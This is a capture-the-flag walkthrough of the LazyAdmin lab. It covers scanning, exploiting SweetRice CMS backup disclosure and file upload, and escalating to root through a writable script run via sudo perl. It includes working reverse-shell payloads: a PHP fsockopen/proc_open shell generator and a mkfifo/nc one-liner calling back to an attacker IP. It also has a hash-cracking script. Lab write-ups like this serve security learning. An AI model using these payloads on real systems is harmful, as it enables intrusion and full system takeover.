LazyAdmin

Reconnaissance

Initial nmap scan to find open ports. The -Pn flag ("treat all hosts as alive") skips host discovery, which matters when the target drops ICMP probes and would otherwise be reported as down.

nmap -Pn 10.10.144.123

Detailed Nmap Scan:

Command Breakdown:

  • (-sV): Probe the open ports to determine service and version

  • (-sC): Run the default set of NSE scripts

  • (-p): Only scan ports 22 and 80, the ones the first scan found open

  • (-oN nmap): Save the output in normal format to a file called nmap

nmap -sC -sV -p 22,80 -oN nmap 10.10.144.123
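As an added example (not the writeup's own code), a small POSIX shell script that chains the two scans: it parses the open ports out of the first scan's grepable output and builds the detailed command from them, so the port list is never typed by hand. The grepable output below is a constructed sample, and the script assumes the first scan was run with -oG (ideally with -p- so nothing outside the default top ports is missed).

```shell
#!/bin/sh
# Added example: feed the open ports of a first nmap pass into the -sC -sV scan.
# Assumes the first scan was run with grepable output, e.g.
#   nmap -Pn -p- --open -oG scan.gnmap 10.10.144.123

# Extract open TCP ports from a grepable nmap file as a comma-separated list.
open_ports_from_gnmap() {   # $1 = .gnmap file
    # "Ports: 22/open/tcp//ssh///, 80/open/tcp//http///" -> "22,80"
    grep -o '[0-9]*/open/tcp' "$1" | cut -d/ -f1 | sort -n | tr '\n' ',' | sed 's/,$//'
}

# Build the follow-up command so the detailed scan only touches what is open.
detailed_scan_cmd() {   # $1 = .gnmap file, $2 = target
    ports=$(open_ports_from_gnmap "$1")
    echo "nmap -sC -sV -p $ports -oN nmap $2"
}

# Constructed sample of what nmap -oG writes for this host (not a real capture).
SAMPLE_GNMAP=$(mktemp)
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap scan initiated as: nmap -Pn -p- --open -oG scan.gnmap 10.10.144.123
Host: 10.10.144.123 ()  Status: Up
Host: 10.10.144.123 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///  Ignored State: closed (65533)
# Nmap done
EOF

# Prints: nmap -sC -sV -p 22,80 -oN nmap 10.10.144.123
detailed_scan_cmd "$SAMPLE_GNMAP" 10.10.144.123
```

Pipe the printed command into sh (or just run it) once you are happy with the port list; keeping the two passes separate means the slow script scan never runs against closed ports.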

Enumeration

Let's go visit the website.

It's an Apache2 default page and the page source gives us nothing. Let's use gobuster to brute-force directory names.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.144.123/

We found a directory called /content, let's go visit it.

Looks like the site is running a CMS called SweetRice, so let's search for known exploits with searchsploit.

searchsploit sweetrice 

We find a few vulnerabilities. I'm going to try the Backup Disclosure one first, as a database backup can hand us usernames, password hashes and a lot more.

Let's copy the exploit to our working directory and read it.

searchsploit -m php/webapps/40718.txt

After reading through the exploit, it tells us to visit /inc/mysql_backup to find backup files. That path is relative to the SweetRice install, so on this box it is /content/inc/mysql_backup.

Let's go visit that page.

We find a file, let's download it. Reading through it, we find a username and a password field.

The password value doesn't look like a password: it is a hash, so we need to recover the plaintext from it. A lookup site such as crackstation works for exactly this case, an unsalted hash of a value already in its tables.

And we found the password.
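As an added example (not the writeup's code), a shell script that does the two steps above offline: it pulls the admin name and password hash out of a backup row and tries the hash against a wordlist. The dump row is a constructed sample in the style of a SweetRice options row (a PHP-serialised array with admin and passwd keys), the wordlist is constructed too, and the hash is assumed to be unsalted MD5, which is what a crackstation-style lookup handles.

```shell
#!/bin/sh
# Added example: extract admin credentials from a backup row and crack the hash.
# Assumptions: the backup holds a PHP-serialised array with "admin" and "passwd"
# keys, and the password hash is unsalted MD5.

# Constructed sample row in the shape of a SweetRice mysql_backup dump (not the real file).
SAMPLE_DUMP=$(mktemp)
cat > "$SAMPLE_DUMP" <<'EOF'
INSERT INTO `%--%_options` VALUES ('1','global_setting','a:5:{s:4:"name";s:8:"LazyBlog";s:5:"admin";s:7:"manager";s:6:"passwd";s:32:"42f749ade7f9e195bf475f37a44cafcb";s:4:"lang";s:2:"en";s:5:"email";s:0:"";}','0');
EOF

# Constructed wordlist; a real run would use rockyou.txt or similar.
WORDLIST=$(mktemp)
printf '%s\n' password admin123 Password123 letmein > "$WORDLIST"

# Pull a string value out of a PHP-serialised array by key: s:N:"key";s:M:"value"
serialized_value() {   # $1 = key, $2 = file
    grep -o "s:[0-9]*:\"$1\";s:[0-9]*:\"[^\"]*\"" "$2" | head -n1 \
        | sed 's/.*;s:[0-9]*:"\([^"]*\)"$/\1/'
}

# Hash every wordlist entry as unsalted MD5; print the match and return 0, else return 1.
crack_md5() {   # $1 = hex hash, $2 = wordlist file
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        h=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

ADMIN=$(serialized_value admin "$SAMPLE_DUMP")
HASH=$(serialized_value passwd "$SAMPLE_DUMP")
PLAIN=$(crack_md5 "$HASH" "$WORDLIST") || PLAIN="(not in wordlist)"
# Prints: user=manager hash=42f749ade7f9e195bf475f37a44cafcb password=Password123
echo "user=$ADMIN hash=$HASH password=$PLAIN"
```

The extraction deliberately does not parse the whole serialised blob, only the two key/value pairs we care about; if a backup stored a salted or iterated hash instead, crack_md5 would never match and you would need the algorithm and salt before trying any wordlist.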

Now we need a login page to use these credentials, so let's run gobuster against the /content/ directory to find more hidden directories.

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.144.123/content

Visiting the /as directory (/content/as), we find the login page.

Let's log in with the credentials we found.

Username: manager

Password: Password123

And we are logged in!

Looking through the admin panel, we can see multiple upload pages, but the Media Center page looks interesting as it shows us what files we can upload.

But first we need to find a matching vulnerability, so let's go back to searchsploit.

searchsploit sweetrice

We can see there is an Arbitrary File Upload vulnerability, let's use that. First we need to copy it to our directory.

searchsploit -m php/webapps/40716.py

Reading through the exploit, it looks like we can upload a file named shell.php5 containing a PHP reverse shell: the upload is accepted with that extension, while the server still executes it as PHP.

We can take the PHP reverse shell from pentestmonkey. Copy it to your machine, set the IP to your attacking machine's IP and the port to 1234, and rename the file to shell.php5 before uploading it through the Media Center.

Once the file is uploaded, start a Netcat listener on the port you put in the shell. Do this before triggering the file, or the connection back has nothing to reach.

nc -lvnp 1234

Now click the uploaded file on the website (or request its URL directly) and the shell connects back to the listener.

Now you can read the user.txt file in /home/itguy, which is the answer to the first question.
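As an added example (not the writeup's or pentestmonkey's code), a small shell helper for the upload step above: it writes a minimal PHP reverse shell under an alternate extension and warns if the name would keep a plain .php extension the filter may reject. The attacker IP is the writeup's and is a placeholder for your own; which alternate extensions a server executes as PHP depends on its handler rule (the writeup shows .php5 working on this box, .phtml is an assumed extra).

```shell
#!/bin/sh
# Added example: generate a minimal PHP reverse shell under an extension the upload
# check lets through while Apache still hands the file to PHP.

# Return 0 if the filename uses an alternate PHP extension.
# Assumed list: .php5 is what the writeup uses here; .phtml depends on the server's handler rule.
php_alt_extension() {   # $1 = filename
    case "$1" in
        *.php5|*.phtml) return 0 ;;
        *) return 1 ;;
    esac
}

# Write a reverse shell to $3 that connects back to $1:$2 and attaches /bin/sh to the socket.
make_php_shell() {   # $1 = attacker IP, $2 = port, $3 = output file (e.g. shell.php5)
    php_alt_extension "$3" || echo "warning: $3 keeps an extension the upload filter may reject" >&2
    cat > "$3" <<EOF
<?php
// Connect back to the listener and wire stdin/stdout/stderr of a shell to the socket.
\$sock = fsockopen("$1", $2);
if (!\$sock) { die("connect failed"); }
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
proc_close(\$proc);
?>
EOF
}

# Listener to run on the attacking machine before requesting the uploaded file.
start_listener() {   # $1 = port
    nc -lvnp "$1"
}

# Usage: 10.13.8.64 is the writeup's VPN address, replace it with your own.
SHELL_OUT="$(mktemp -d)/shell.php5"
make_php_shell 10.13.8.64 1234 "$SHELL_OUT"
echo "wrote $SHELL_OUT; now run: start_listener 1234, upload it, then request it on the target"
```

The payload is the proc_open form of the well-known PHP one-liner rather than pentestmonkey's full script, so it has no daemonising or timeout handling; that is fine for a CTF box but the full script is more robust when the web server kills long requests.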

Privilege Escalation

In the home directory of itguy we can also see a file called backup.pl, let's see what it does.

It runs a script called copy.sh. Whatever copy.sh contains runs with the privileges of whoever executes backup.pl, so if we can write to copy.sh and run backup.pl as root, a reverse shell placed in copy.sh comes back as root. Check the permissions with ls -l first: copy.sh is owned by root, but what matters is that it is writable by us.

Let's write our reverse shell, with our IP and port, into this file (the one-liner is from pentestmonkey's reverse shell cheat sheet). Replace 10.13.8.64 with your own IP, write to the path that backup.pl actually references, and note that this overwrites the file's existing contents and needs nc on the target.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 4321 >/tmp/f" > copy.sh

After that we need to run the file, but first we check what we are allowed to run as root, using sudo -l.

It shows we can run backup.pl through perl as root. Before running it, start a listener on the port used in copy.sh.

nc -lvnp 4321

Once we run the command, we get a reverse shell as root:

sudo /usr/bin/perl /home/itguy/backup.pl

Now you can get the root flag in /root and answer the last question of this room.
